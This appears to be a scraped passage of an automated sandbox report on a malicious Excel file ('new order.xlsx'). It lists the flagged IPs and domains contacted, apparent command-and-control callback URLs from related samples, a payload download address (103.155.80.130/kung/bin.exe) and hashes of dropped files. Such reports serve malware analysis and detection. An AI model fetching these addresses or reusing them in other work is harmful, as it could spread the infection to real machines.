                                                                                                                                    http://suche.freenet.de/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://search.interpark.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://clients5.google.com/complete/search?hl=explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          http://investor.msn.com/explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://search.espn.go.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://www.myspace.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://search.centrum.cz/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://p.zhongsou.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://service2.bfast.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  199.59.242.153
                                                                                                                                                  		www.globaltradeview.comUnited States
                                                                                                                                                  		395082BODIS-NJUStrue
                                                                                                                                                  34.102.136.180
                                                                                                                                                  		thinking-diversity.comUnited States
                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                  103.155.80.130
                                                                                                                                                  		unknownunknown
                                                                                                                                                  		134687TWIDC-AS-APTWIDCLimitedHKtrue

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                  Analysis ID:452636
                                                                                                                                                  Start date:22.07.2021
                                                                                                                                                  Start time:17:09:37
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 11m 34s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:new order.xlsx
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                  Number of analysed new started processes analysed:9
                                                                                                                                                  Number of new started drivers analysed:2
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.expl.evad.winXLSX@9/13@4/3
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 27.6% (good quality ratio 26.2%)
                                                                                                                                                  • Quality average: 71.1%
                                                                                                                                                  • Quality standard deviation: 29%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsx
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe
                                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  17:11:10API Interceptor100x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                  17:11:14API Interceptor221x Sleep call for process: vbc.exe modified
                                                                                                                                                  17:11:55API Interceptor205x Sleep call for process: wlanext.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  199.59.242.153PO_2005042020.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.funif.icu/dt9v/?WJBxWP=/dNyVkAccEq0OhJt4Ytz8g7S8Q6mx9qNCmyMDejIdoAPysAyB6+9naP82D/jnnZeL5y1&tFQp=7nutZ
                                                                                                                                                  Swift.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.chicagolandjunkcarbuyer.com/thl4/?oTO=9XRvGPdd9OZjw66gJDqZc4Tbb4K4WVD9/14pVD3HzfT4/RgnF8iuNk1sdPo8LsHsBiNm&YTLLWz=6lgHDJPh
                                                                                                                                                  SWIFT MT103.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.gor.xyz/gscc/?g2JpWVKx=45WLw/qHVVUFgrjwGZOJHGiR4I/cQSQnF8oHOeXkYfHHiqRoy/0ZD/TpSUhrjbztz6x+QlAMnQ==&i48dF=AHEdxvQpNPBdxT6p
                                                                                                                                                  RFQ-Order contract requirements.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.gor.xyz/gscc/?PB6pE=45WLw/qHVVUFgrjwGZOJHGiR4I/cQSQnF8oHOeXkYfHHiqRoy/0ZD/TpSUhS8qTu9st5QlAL0g==&l4=8potZVWpGZZ
                                                                                                                                                  hGpEbxogJ3.msiGet hashmaliciousBrowse
                                                                                                                                                  • www.chicagolandjunkcarbuyer.com/thl4/?VJBxa=6l9pDXLHZLZt8&sZyTH=9XRvGPdd9OZjw66gJDqZc4Tbb4K4WVD9/14pVD3HzfT4/RgnF8iuNk1sdMIsENXUfHkh
                                                                                                                                                  Fra8994.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.hitbars.space/q3t0/?_6F=+3dTbzfZs6MxWUk0s5DG9DSasbGeOcbq1TMJ6iU03rkZ0Vw53zLFflffW1vOU7AfPTuy&6l=CXf4ZT4
                                                                                                                                                  Statement for MCF and SSL890935672002937383920028202.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.hullyc.com/3b4e/?qPtlS=BR-TqN&7nh=4ePaE0hXFCcoXxwZO8an49njM/FSx2KIc8Ta6ac5S7lyJ0MkFWvwf74A2m12MQKM4anz
                                                                                                                                                  INVOICE E-4137 REV.1 AND E-4136 REV.1.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.cleaner-solar.com/u9pi/?4hNHZPS8=4OyfnYx74NgWtXxZ7Rjofv7BR5c/IYUL06mPXh1Fccw5xmvA4OPZgb7qUWOtnmXbMvoo&op7=ob08qfOhk
                                                                                                                                                  Img-347654566091235.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.hitbars.space/q3t0/?q6A=+3dTbzfZs6MxWUk0s5DG9DSasbGeOcbq1TMJ6iU03rkZ0Vw53zLFflffW2P0EqgnV0P1&5j=6lULKpmp0J0
                                                                                                                                                  LEMO.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.booster.guru/aipc/?f6A8Sz=BMi4rIX3OaRmAVdWmHwDy158GXvJowW6rsMkLX8T/SeurUfZZjefoMGqIKxJ2f9Kzzfm&sDKp4l=3fHXUDz8CN-
                                                                                                                                                  vbc.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.gettollingagain.com/lth/?QPi=R0ZjXo5eb12AQfL2mJSQ4Pke5FoJc2BIBKrjfE0luvFwR4nyycvvY6a4I3dzSm6JElVt&EN=z2JTn6-hWBQxkJMP
                                                                                                                                                  0m445A5H66.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.wwwmacsports.com/nff/?E6Ap=0DK8_4-Xijpdzt&fZzpL=m9tMrdH5s5McIQQpiSGs8SInYxUL4H2IAxrYgc1ZIVpX4WbHn5hGWqowwb7fTo8LB/Xn
                                                                                                                                                  sample17.exeGet hashmaliciousBrowse
                                                                                                                                                  • ww1.blm35.net/
                                                                                                                                                  444890321.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.oklahomasundayschool.com/ccr/?FJB=AxjKtjbRfNJtNPnejOfQjb3R2KRHRMY2w4U1+yq2aSZlRtrxzdj5Yr2imIB9O7nqKvHd&v0=JDK8Zp
                                                                                                                                                  2435.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.northsytyle.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W
                                                                                                                                                  ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.greenshirecommons.com/un8c/?8p=mBlnh5cldNPXtcmrZbSjCDRuhUw9cugXgXVTMTkNCQGRZTLNWcZvUlnJwuwR4xQFHfof&h6Z=FZOTUTGPt4-
                                                                                                                                                  fD56g4DRzG.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.frontpagesweb.net/w88t/?1bWl=DwAbJomwIIUam/8Lxif0xJyCLP0/MlDCQn/X6EWMKnqqCjXzJeuBHxh9ROI30kSy7fCE&z6z=STRxNL2x
                                                                                                                                                  malware300.docmGet hashmaliciousBrowse
                                                                                                                                                  • ww25.gokeenakte.top/admin.php?f=1&subid1=20210605-2000-3553-b2c5-4eab817b0105
                                                                                                                                                  Payment.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.digitalgamerentals.com/ngvm/?3fl00=eXBfF5JabAMvoJeV+Y5ra8EK8SdWvzGjXwXzLVFQuPc9hZ/16jkYHGAZEYy2Tm7CaklT&9rdLfJ=i48HtpdXmp
                                                                                                                                                  PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.chrispricellc.com/owws/?y8z=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6zNTHuB4YMFv&UDKPKv=04i8JpzhsHVX

                                                                                                                                                  Domains

                                                                                                                                                  No context

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  BODIS-NJUSPO_2005042020.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Swift.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  SWIFT MT103.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  RFQ-Order contract requirements.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  hGpEbxogJ3.msiGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Fra8994.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Statement for MCF and SSL890935672002937383920028202.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  INVOICE E-4137 REV.1 AND E-4136 REV.1.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Img-347654566091235.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  LEMO.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  vbc.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  0m445A5H66.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  sample17.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  444890321.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  2435.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  fD56g4DRzG.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  malware300.docmGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Payment.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  TWIDC-AS-APTWIDCLimitedHKswift.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.80.201
                                                                                                                                                  SPARE PARTS Provision List.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.82.200
                                                                                                                                                  RIi1iCfuVK.exeGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.93.196
                                                                                                                                                  kkXJRT8vEl.exeGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.93.196
                                                                                                                                                  G7VMyVn1TZ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 103.153.76.164
                                                                                                                                                  G7VMyVn1TZ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 103.153.76.164
                                                                                                                                                  r3xwkKS58W.exeGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.92.207
                                                                                                                                                  P58w6OezJY.exeGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.92.207
                                                                                                                                                  SPARE PARTS Provision List.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.82.200
                                                                                                                                                  ySZpdJfqMO.exeGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.92.207
                                                                                                                                                  IPVrDRKfYj.exeGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.92.207
                                                                                                                                                  6BeKYZk7bg.exeGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.92.207
                                                                                                                                                  New order (DDV21-0014) TOKYO HIP.pptGet hashmaliciousBrowse
                                                                                                                                                  • 103.153.76.164
                                                                                                                                                  lpaBPnb1OB.exeGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.92.207
                                                                                                                                                  Official-freight rate.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.82.200
                                                                                                                                                  appointment letter.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.80.130
                                                                                                                                                  RhTYEkOi2j.exeGet hashmaliciousBrowse
                                                                                                                                                  • 103.153.76.164
                                                                                                                                                  xBMx9OBP97.exeGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.92.207
                                                                                                                                                  sonia_5.exeGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.92.207
                                                                                                                                                  jYzWBKTsxE.exeGet hashmaliciousBrowse
                                                                                                                                                  • 103.155.92.207

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):721408
                                                                                                                                                  Entropy (8bit):7.749166309747153
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:8xQ/7SxjdzTy44OiFTH/xar1sFrnRQPjiN4/3fhAjxDRHEiloRyp:8xQmfy44jtxxFtUjq4/pMxDJ
                                                                                                                                                  MD5:750919BD7E02E7821EFA1B1BD0ED4EDA
                                                                                                                                                  SHA1:2D925D1D04D12C72E4411D84B2C2B297D09F2C3C
                                                                                                                                                  SHA-256:994F99037072FBEA77A376832818FEC2BDAF577A09B1936A7285E38ACE5D8E4F
                                                                                                                                                  SHA-512:087D25C798E2429B34B408FF0A315018A46FEB833D5286AB87835B5B2E49FD7B3079FACF5BE7CE44EC5E5869F2390AB50066DFDAAAE7F638C0F9D427B919162F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                  Reputation:low
                                                                                                                                                  IE Cache URL:http://103.155.80.130/kung/bin.exe
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..`..............P.................. ... ....@.. .......................`............@.................................<...O.... ..X....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...X.... ......................@..@.reloc.......@......................@..B................p.......H.......X....&...........................................................O.z....T....N..~/...-...u..JF.y?..E\.!.<._...|.dI..6.....\..<...j.......9....#`..U.E.....b........u..p...F.+..lq..).E=m....2...m.'.8/.dk.......Y.J.f..l...h.N.v.9B.*.........5%.kOUAK.......^...c0V...0.D.......................S........k1..c_.'T..zi:.....B..r.*v.c.N.r.P..o...{....(...M.3..0|.k.}4..Ki..#.y.+T1U..~....../......{..Z..!l'.>.E.EzL..Q.=7....X.P.qft.....1.%>....^..[c(.....)..s.0...
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\238B5502.emf
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):648132
                                                                                                                                                  Entropy (8bit):2.8123774663976793
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:d34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:94UcLe0JOcXuunhqcS
                                                                                                                                                  MD5:3C7747E6D9F426944566A7CC7A5A2608
                                                                                                                                                  SHA1:146829010E3A61D52397CF8F08EFAC4C29BB4859
                                                                                                                                                  SHA-256:0295DFBAED0E54EE9EA659CCF39A71783994C92F80F7E3F98CBF878534E71017
                                                                                                                                                  SHA-512:F82B007083F360DD8EEB2D799F35004E393405B6FCF5088D29A74C229D428A97331A07DA106AC1B087D80325C28668C6167D2C59181C52B83F0281BE864387B6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................x$......-z.x.@..%.............8......N[P8..0.............N[P8..0.. ....y.x0..8.. ............z.x........................................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X...0..d.............vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... .m.6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3515A697.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):94963
                                                                                                                                                  Entropy (8bit):7.9700481154985985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                  MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50113C60.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):85020
                                                                                                                                                  Entropy (8bit):7.2472785111025875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D8F69D3.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):94963
                                                                                                                                                  Entropy (8bit):7.9700481154985985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                  MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F7C9E9A.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11303
                                                                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
